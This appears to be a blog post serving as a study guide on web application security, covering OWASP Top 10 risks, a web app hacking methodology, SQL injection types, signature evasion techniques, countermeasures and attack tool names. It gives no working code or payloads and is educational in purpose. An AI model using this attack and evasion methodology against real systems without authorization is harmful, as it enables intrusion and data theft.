Web Application-Threats and Security

Volume-1

- Web App Concepts
- Web App Threats
- Web App Hacking Methodology

Web App Concepts

Web Applications run on a remote application server and are available for clients over the Internet. A web application can be available on different platforms, for example, browsers and software. The use of web applications has increased enormously in the last few years. 

They depend on a client-server relationship and provide an interface for clients to use web services. Web pages may be generated on the server or may contain scripts for dynamic execution on the client web browser.

Web App Threats

Threats to Web Applications include: 

  • Cookie Poisoning  
  • Insecure Storage  
  • Information Leakage  
  • Directory Traversal  
  • Parameter/Form Tampering  
  • DOS Attack  Buffer Overflow  
  • Log Tampering  SQL Injection  
  • Cross-Site (XSS)
  • Cross-Site Request Forgery
  • Security Misconfiguration 
  • Broken Session Management 
  • DMZ Attacks Session Hijacking
  • Network Access Attacks

Invalidated Inputs 

Invalidated input refers to processing non-validated input from the client to a web application or backend server. This vulnerability can be exploited to perform XSS, buffer overflow, and injection attacks. 

Parameter/Form Tampering 

Parameter Tampering refers to an attack in which parameters are manipulated while the client and server communicate. An attacker modifies parameters such as the Uniform Resource Locator (URL) or web page form fields. In this way, a user may be redirected to another website, which may look exactly like the legitimate site, or an attacker can modify the fields, for example, cookies, form fields, and HTTP Headers.

Injection Flaws 

Injection attacks work because of web application vulnerabilities. If a web application is vulnerable enough to allow untrusted input to be executed, then the following injection attacks can be performed: 

  • SQL Injection  
  • Command Injection
  • LDAP Injection

SQL Injection

SQL Injection is the injection of malicious SQL queries. Using SQL queries, an unauthorized user interrupts the processes, manipulates the database, and executes commands and queries by injection, resulting in data leakage or loss. These vulnerabilities can be detected by using application vulnerability scanners. An SQL injection is often executed using the address bar. Attackers bypass the vulnerable application's security and extract valuable information from its database using SQL injection.

OWASP Top 10 Application Security Risk  

The OWASP Top 10 is the best way to start transforming an organization's software development culture towards one that produces more secure code, and their desktop applications minimize these risks.

Broken access control

Access control limits what users can access, restricting them to resources within their assigned permissions. Access control failure commonly results in users performing business functions that require different permissions than they were assigned, among other activities. Failure also leads to unauthorized information disclosure, modification, or data destruction.

Cryptographic failures

Cryptographic failures are a broad symptom of a breakdown or deficiency in cryptography, which can lead to system compromise or sensitive data exposure. Personally identifiable data and credit card numbers are among the data types that require extra protection. Data protection methods are determined by the type of data and whether or not it is subject to data privacy laws such as the EU General Data Protection Regulation (GDPR).

Injection

Injection vulnerabilities can be detected through source-code review. This category includes cross-site scripting, SQL injection, and XML injection, among many others. Automation can help by ensuring all parameters and data inputs are tested to identify vulnerabilities.

Applications are vulnerable to injection when:

  • User-entered data is accepted without validation, sanitization, or filtering.
  • Hostile data is used to extract sensitive information.

Insecure design

Insecure design differs from insecure implementation. A secure design can be implemented imperfectly, resulting in vulnerabilities. Insecure design can’t be fixed through implementation since the design itself doesn’t contain appropriate security controls. A failure to accurately assess business risk associated with the software or system under development leads to insufficient levels of security.

Security misconfiguration

Security misconfigurations can be caused by an array of inappropriately configured controls and other factors contributing to application vulnerability. This category includes many common misconfigurations.

  • Misconfigured permissions for cloud services.
  • Enabling unnecessary features may lead to needlessly opened ports, services, or incorrectly elevated privileges.
  • Unchanged default account login credentials.

Vulnerable and outdated components

Unpatched and legacy components that remain in production well after vulnerabilities are discovered and disclosed can be a major risk. Applications can be vulnerable when they aren’t running the latest software version. The application may be vulnerable if it’s unclear which library or component version is being used. Components that aren’t scanned for vulnerabilities may also be at risk.

Identification and authentication failures

Authentication and identification failures happen when user identity, authentication, and session information aren’t confirmed before the user is permitted to access systems and data. Factors that may put an application at risk due to these failures include allowing weak passwords; using weakly hashed, plain-text password data stores; and allowing bots, which can perform automated attacks such as brute-force and credential stuffing.

Software and data integrity failures

New to the OWASP list is the CWE of failures in software and data integrity. The risk here is trusting data and software updates without checking their integrity. Attackers have used the software supply chain to issue malware through seemingly legitimate software updates. Many systems use automated software update features that do not verify the integrity of updates.

Security logging and monitoring failures

The security logging and monitoring failures category focuses on issues with audit logs and monitoring during an attack. Security monitoring and logs are essential to detect and mitigate an active breach. Failures happen when:

  • Logging doesn’t keep track of transactions with high value, login attempts, and failed login attempts.
  • Errors and warnings generate unclear, inadequate, or no log entries.
  • APIs and applications aren’t monitored for suspicious activities. Aren’t monitored for suspicious activities.
  • Security logs are only available locally.
  • Applications that can neither detect nor issue timely alerts for attacks in progress.

Server-side request forgery (SSRF)

The server-side request forgery category focuses on weaknesses within user-convenience features. SSRF flaws happen when web applications fetch user-requested remote sources without first verifying the destination. Specific requests can be sent to the application through an unexpected source. 

Web App Hacking Methodology

Footprint Web Infrastructure

Footprinting web application infrastructure helps to discover information, vulnerabilities, and entry point in the target web application. There are different techniques to footprint web infrastructure, such as: 

  • Collecting Server related information (version, make, model, etc.)  
  • Services Footprinting (running services, vulnerable services, ports)  
  • Network Footprinting (open, closed, and filtered ports)

Analyze Web Applications  

Analyzing Web Applications includes observing the functionality and other parameters to identify vulnerabilities, entry points, and server technologies that can be exploited. HTTP requests and HTTP fingerprinting techniques are used to diagnose these parameters.

By-pass Client-side Control  

Web security becomes even more challenging when a web application supports clients to submit arbitrary input. Some of the application partially or completely depends on client-side controls. It is a security flaw because a user has full control over the client and the data it submits. It can bypass the control that is not replicated on the server side. Following are some techniques to bypass client-side controls:

  • Bypass hidden form fields  
  • Bypass client-side JavaScript validation  
  • Parameter manipulation  
  • Forced browsing

Attack Authentication Mechanism  

By exploiting the Authentication Mechanism using different techniques, an attacker may bypass the authentication or steal information. Attacking on authentication mechanism includes: 

  • Username Enumeration  
  • Cookie Exploitation  
  • Session Attacks  
  • Password Attacks  

Authorization Attack Schemes  

By accessing the web application using a low-privilege account, an attacker can escalate privileges to access sensitive information. Different techniques like URL, POST data, Query string, cookies, parameter tampering, and HTTP header are used to escalate privileges.

Attack Access Control

A web application authorizes its users to access the resources and functions using an access control mechanism. In a web application, an access control mechanism plays an important role as it authorizes access to the content and resources published in that particular application.

Session Management Attack  

A Session Management Attack is performed by bypassing authentication to impersonate a legitimate authorized user. This can be done using different session hijacking techniques such as: 

  • Session Token Prediction  
  • Session Token Tampering  
  • Man-in-the-Middle Attack  
  • Session Replay  

Perform Injection Attacks  

An Injection Attack is the injection of malicious code, commands, and files by exploiting vulnerabilities in a web application. An injection attack may be performed in different forms, like: 

  • Web Script Injection
  • OS Command Injection  
  • SMTP Injection  
  • SQL Injection  
  • LDAP Injection  
  • XPath Injection  
  • Buffer Overflow  
  • Canonicalization

Attack Database Connectivity  

A Database Connectivity Attack focuses on exploiting the data connectivity between an application and its database. Initiating a connection to the database requires a connection string. A data connectivity attack includes: 

  • Connection String Injection  
  • Connection String Parameters Pollution (CSPP)  
  • Connection Pool DoS

Attack Web Client  

Web browsers running on the user's machines that render the requested pages from the application server are typically called web clients.  The definition of web client also covers "thin client," which does not execute complex rules as these operations are off-loaded on the server.

Attack Web Services  

An application server runs several web-related services that support an application in loading, executing, and functioning properly. These running web services may include vulnerable services protocols (such as SOAP, WSDL, UDDI, and others) that an attacker can target.

Web APIs  

The Web Application Programming Interface (API) is an intermediary component of a web application that helps applications communicate with other applications, services, and platforms.  APIs are typically used for accessing, extracting, and sharing data. SOAP and Rest APIs are popular approaches used in web applications.

WebHooks, & Web Shell  

Webhooks are user-defined callbacks that are triggered by an event. They are unlike a typical API in which data is frequently polled for real-time ingestion. The server responds with a POST request whenever a web client requests a webhook call. These incoming requests should be authenticated to avoid any malicious ingestion like MITM, XSS, and Scripting.


Volume-2

Lesson Objectives:

- SQL Injection Concepts
- Types of SQL Injection
- SQL Injection Methodology
- SQL Injection Tools
- Evasion Techniques
- SQL Injection Countermeasures

SQL Injection Concepts

SQL Injection Attack uses SQL websites or web applications. It relies on strategically injecting malicious code or scripts into existing queries. This malicious code is drafted to reveal or manipulate data stored in the tables within a database. SQL injection is a powerful and dangerous attack. It identifies the flaws and vulnerabilities in a website or application. The fundamental concept of SQL injection is to inject commands to reveal sensitive information from the database. Hence, it can result in a high-profile attack.

Types of SQL Injection

SQL Injections can be classified into three major categories:

  • In-band SQLi
  • Inferential SQLi
  • Out-of-band SQLi

In-band SQL Injection 

In-band SQL Injection includes injection techniques that use the same communication channel to launch an injection attack and to gather information from the response. In-band injection techniques include:

  • Error-based SQL Injection: Injection Error-based SQL Injection is an in-band SQL injection technique. It relies on error messages from the database server to reveal information about the structure of the database. Error-based SQL injection is very useful for an attacker to enumerate an entire database. Error messages are used during the development phase to troubleshoot issues. These messages should be disabled when an application website is live. Error-based SQL injection can be performed using the following techniques: 
    • System Stored Procedure 
    • End of Line Comment  
    • Illegal/Logically incorrect Query  
    • Tautology
  • Union-based SQL Injection. Union-based SQL Injection is another in-band SQL injection technique that involves using the UNION SQL operator to combine the results of two or more SELECT statements into a single result.

Inferential SQL Injection (Blind Injection) 

No data is transferred from a web application in an Inferential SQL Injection. These are referred to as Blind Injections because the attacker cannot see the results of an attack; they simply observe the server's behavior. The two types of inferential SQL injection are:

  • Boolean-based Blind SQL Injection
  • Time-based Blind SQL Injection.

Boolean Exploitation Technique.  Blind SQL injection is the technique of sending a request to a database. The response is either true or false, so it does not contain any database data. By observing the HTTP response, the attacker can evaluate it and infer whether the injection was successful or unsuccessful. 

Out-of-band SQL Injection  

Out-of-band SQL Injection is a technique that uses different channels to launch the injection and to gather the response. It requires some features to be enabled, for example, DNS or HTTP requests on the database server; hence, it is not very common.

SQL Injection Methodology

Information Gathering and SQL Injection Vulnerability Detection  

In the Information Gathering phase, information about the web application, Operating System, database, and the structure of the components is collected. Evaluation of the extracted information is useful for identifying vulnerabilities that can be exploited.

Launch SQL Injection Attacks  

An appropriate SQL injection attack can be initiated just after gathering information about the structure of a database and the vulnerabilities found. An injection succeeds by exploiting them.

How can SQL Injection be Prevented?

Open Worldwide Application Security Project (OWASP) SQL Injection Cheat Sheet

  • Use Input Validation 
  • Use a Web Application Firewall (WAF)
  • Use parameterized Queries
  • Use Whitelist instead of Blacklist 
  • Sanitize Encode user-Provided Inputs

Evasion Techniques

To secure a database, it is recommended that deployment is isolated in a secure network location with an Intrusion Detection System (IDS). IDS continually monitors the network and host traffic and database applications. Using different evasion techniques, the attacker has to evade IDS to access the database.

Types of Signature Evasion Techniques:  

  • Inserting Inline Comments between Keywords  
  • Character Encoding  
  • String Concatenating  
  • Obfuscating Codes  
  • Manipulating White Spaces  
  • Hex Encoding 
  • Sophisticated Matches 

Countermeasures 

Several detection tools are available to mitigate SQL injection attacks. These tools test websites and applications, report the data and issues, and take remediation action. Some of these advanced tools also offer a technical description of the issue.

Other SQL Injection Countermeasures 

  • Limit the length of user input 
  • Use custom error messages 
  • Monitor DB traffic using an IDS, WAF 
  • Disable commands like xp_cmdshell 
  • Isolate database server and web server 
  • Always use method attribute set to POST and low privileged account for DB connection 
  • Run database service account with minimal rights 
  • Move extended stored procedures to an isolated server 
  • Use typesafe variables or functions such as IsNumeric to ensure type safety 
  • Validate and sanitize user inputs passed to the database 

SQL Injection Tools

  • BSQL 
  • SQLmap  
  • SQLninja
  • BSQL Hacker
  • Marathon Tool
  • SQL Power Injector
  • Havij

    Feel free to give your suggestion that I add on ...
    Thank you for your insights to look for something interesting in Web development Security perspective 😊

    I think you want something more..👀

    So don't worry, I will come back soon with an amazing and interesting topic.

Comments

Post a Comment

Popular among the all

Image
  Container Chronicles: Exploring Containers and Beyond Hello everyone,👋 A warm welcome to all of you.😄 Have you ever wondered how software applications run consistently across different computers, servers, or even in the cloud??🤔 Containers  - the unsung heroes of modern software development.  In this blog post, we'll delve into the world of containers, breaking down what they are, how they work, and why they're essential in today's digital landscape. What is Container? So for it's easy understanding let's imagine you're moving to a new house, and you want to pack all your belongings in a neat, organized, and portable way. That's precisely what containers do for software applications. A container is like a virtual box that holds everything an application needs to run smoothly - the code, libraries, dependencies, and even the runtime environment. It's self-contained, meaning it can run seamlessly on any computer that supports containers, regardless of...
Read more

While Building a Real-Time Game: Why a Single Stable Port Matters More Than You Think

 When we started developing our real-time multiplayer Rock-Paper-Scissors game with hand gesture recognition, one of the early issues we faced was port switching. It seemed harmless at first—our development environment would simply switch from port 3000 to 3001 if one was busy. But in a real-time WebSocket-based game, this caused major problems. This blog dives into why port stability is critical for any real-time game, especially when using WebSockets and gesture recognition , and how we fixed it. Let me explain the port switching situation and clarify why it's happening and why it's actually not desirable for our game: Why Port Switching Was Happening (The Problem): The port switching between 3000 and 3001 wasn't intentional or beneficial It was happening due to two issues: Nodemon's crash handler trying to kill port 3000 Our code attempting to find alternative ports when 3000 was in use Why Multiple Ports Are NOT Good for Our Game: WebSocket connections (Socket.I...
Read more